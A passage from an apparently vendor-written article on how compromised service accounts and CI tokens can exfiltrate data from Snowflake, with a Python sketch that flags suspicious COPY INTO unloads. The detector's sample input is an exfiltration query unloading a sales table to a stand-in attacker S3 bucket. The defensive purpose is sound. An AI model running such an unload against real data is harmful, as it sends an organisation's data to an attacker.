Imagine a CI pipeline that runs nightly analytics jobs against your Snowflake warehouse. The pipeline uses a service account whose credentials are baked into a Docker image and shared across dozens of repositories. When the job finishes, it writes an artifact containing raw query results to an internal S3 bucket that anyone on the corporate network can read. A few weeks later, an off‑boarded contractor who still has a copy of the service account token discovers the bucket and downloads the data. Your security team traces the breach back to the service account, but no alert ever fired, because the job streamed data out of Snowflake with nothing inspecting or auditing the connection. This unchecked flow is a classic data exfiltration scenario.
This scenario illustrates a common reality: non‑human identities (service accounts, CI tokens, automation keys) are often granted sweeping privileges, stored in places that are easy to copy, and used without any visibility into what they actually do. When one of those identities is compromised, the attacker inherits exactly the same level of access, making data exfiltration a low‑effort, high‑impact attack.
Why data exfiltration is a risk with non‑human identities
Snowflake is designed for massive data analytics, which means it holds large, valuable datasets. Non‑human identities typically have long‑lived credentials that are not tied to a single human user. Because they are meant for automation, they often receive read‑only or read‑write roles on many schemas, tables, and views. The lack of a human in the loop means there is no real‑time review of the queries being executed.
Two concrete weaknesses emerge:
- Unrestricted data flow. An automation job can export entire tables to external storage with a single COPY INTO command. If the job is compromised, that command can be repurposed to ship data to an attacker‑controlled endpoint.
- Invisible activity. Traditional audit logs in Snowflake capture who ran a query, but they do not enforce policy at the moment of execution. If a malicious script runs under the service account, the logs show only that the service account ran the query. Nothing flags the abnormal data volume or destination.
Both issues stem from the fact that the enforcement point is missing. The identity system decides who may start a session, but once the session is established, nothing on the data path blocks or records, in real time, the data that leaves Snowflake.
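To make the two weaknesses concrete, here is a minimal Python sketch of the kind of check that is missing. It inspects a single query record and flags an unload to an unapproved destination or an unusually large transfer. Everything in it is an assumption for illustration: the `QueryRecord` fields, the `ALLOWED_PREFIXES` allowlist, the `MAX_BYTES` threshold, and the bucket names are hypothetical, and the regular expression only recognizes the simplest form of a COPY INTO unload. It is not a Snowflake API and not a complete policy engine.

```python
import re
from dataclasses import dataclass
from typing import List

# Hypothetical allowlist of approved unload destinations (assumption).
ALLOWED_PREFIXES = ("s3://corp-analytics-artifacts/",)
# Hypothetical per-query volume ceiling in bytes (assumption).
MAX_BYTES = 500 * 1024 * 1024

# Captures the target of an unload such as:
#   COPY INTO 's3://bucket/path/' FROM my_table
# or an unload to a stage (COPY INTO @my_stage/path FROM my_table).
# A load (COPY INTO my_table FROM @my_stage) does not match.
_UNLOAD_TARGET = re.compile(
    r"copy\s+into\s+'?((?:s3|gcs|azure)://[^'\s]+|@[^\s']+)",
    re.IGNORECASE,
)


@dataclass
class QueryRecord:
    """Illustrative shape of one logged query; field names are hypothetical."""
    user: str
    query_text: str
    bytes_out: int


def review(record: QueryRecord) -> List[str]:
    """Return a list of findings for one query; an empty list means no flags."""
    findings = []
    match = _UNLOAD_TARGET.search(record.query_text)
    if match:
        target = match.group(1)
        # str.startswith accepts a tuple of candidate prefixes.
        if not target.startswith(ALLOWED_PREFIXES):
            findings.append(f"unapproved destination: {target}")
    if record.bytes_out > MAX_BYTES:
        findings.append(f"volume {record.bytes_out} exceeds {MAX_BYTES}")
    return findings


if __name__ == "__main__":
    suspicious = QueryRecord(
        user="svc_ci",
        query_text="COPY INTO 's3://attacker-bucket/dump/' FROM sales.orders",
        bytes_out=MAX_BYTES + 1,
    )
    for finding in review(suspicious):
        print(f"{suspicious.user}: {finding}")
```

Run over logs after the fact, a check like this only detects the problem. The same logic applied to each statement before it reaches Snowflake is what turns detection into enforcement.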
What a proper enforcement layer looks like
The missing piece is a gateway that sits on the data path between the non‑human identity and Snowflake. The gateway must be able to:
